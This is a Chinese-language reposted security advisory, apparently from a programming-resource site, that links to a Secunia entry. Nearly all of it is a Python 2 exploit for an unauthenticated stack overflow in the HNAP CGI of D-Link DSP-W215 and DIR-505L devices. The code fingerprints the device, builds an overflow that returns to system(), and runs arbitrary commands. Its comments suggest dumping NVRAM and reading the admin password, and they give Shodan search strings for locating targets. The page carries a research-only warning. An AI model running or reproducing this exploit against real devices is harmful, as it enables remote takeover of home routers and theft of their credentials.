链接:http://secunia.com/advisories/58972/ *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Craig ()提供了如下测试方法: =================================================== #!/usr/bin/env python # Unauthenticated stack overflow exploit that affects multiple D-Link products: # # o D-Link DSP-W215 hardware v1, firmware v1.00 # o D-Link DIR-505L hardware v1/2, firmware v1.06/1.07 # # Shodan Dorks: # # o lighttpd/1.4.28-devel-4618M # o lighttpd/1.4.28-devel-2866M # # The my_cgi.cgi CGI page responsible for handling HNAP requests reads # Content-Length bytes into a fixed-size stack buffer. # # This exploit returns to .text to execute system() with a user-supplied # command string (hint: try "nvram get admin_user_pwd"). Output from the # command will be returned to the user. # # Craig Heffner # 2014-05-09 import sys import urllib2 class Device(object):
def __init__(self, model, version, size, ra): self.model = model self.version = version self.size = size self.ra = ra self.model_html = "<ModelName>%s" % self.model self.version_html = "<FirmwareVersion>%s" % self.version def match(self, html): return (self.model_html in html and self.version_html in html) class Vulnerability(object): DEFAULT_COMMAND = "nvram show" VULNERABLE_DEVICES = [ Device("DIR-505", "1.06", 30000, "x00x40x52x34"), Device("DIR-505", "1.07", 30000, "x00x40x5Cx5C"), Device("DSP-W215", "1.00", 1000000, "x00x40x5CxAC"), ] def __init__(self, target, verbose=True): self.verbose = verbose self.target = target self.url = "%s/HNAP1/" % self.target if "://" not in self.url: self.url = "http://" + self.url self._debug_message("Exploit URL: %s" % self.url) def _debug_message(self, msg): if self.verbose: print "[+] %s" % msg def _debug_error(self, err): if self.verbose: print "[-] %s" % err def _build_exploit(self, device, command): # Return to .text section to execute system() with an arbitrary command string buf = "D" * device.size # Fill up the stack buffer buf += "B" * 4 # $s0, don"t care buf += "B" * 4 # $s1, don"t care buf += "B" * 4 # $s2, don"t care buf += "B" * 4 # $s3, don"t care buf += "B" * 4 # $s4, don"t care buf += device.ra # $ra buf += "C" * 0x28 # Stack filler buf += command # Command to execute buf += "x00" # NULL-terminate the command return buf def _request(self, data=None): req = urllib2.Request(self.url, data) try: data = urllib2.urlopen(req).read() except urllib2.HTTPError as e: data = "" if e.code == 500: self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!") else: self._debug_error("Unexpected response: %s" % (str(e))) return data def fingerprint(self): hnap_info = self._request() for device in self.VULNERABLE_DEVICES: if device.match(hnap_info): self._debug_message("Identified target as %s v%s" % (device.model, device.version)) return device self._debug_error("Could not identify target!") return None def execute(self, device, command=DEFAULT_COMMAND): self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version)) return self._request(self._build_exploit(device, command))
易网时代-编程资源站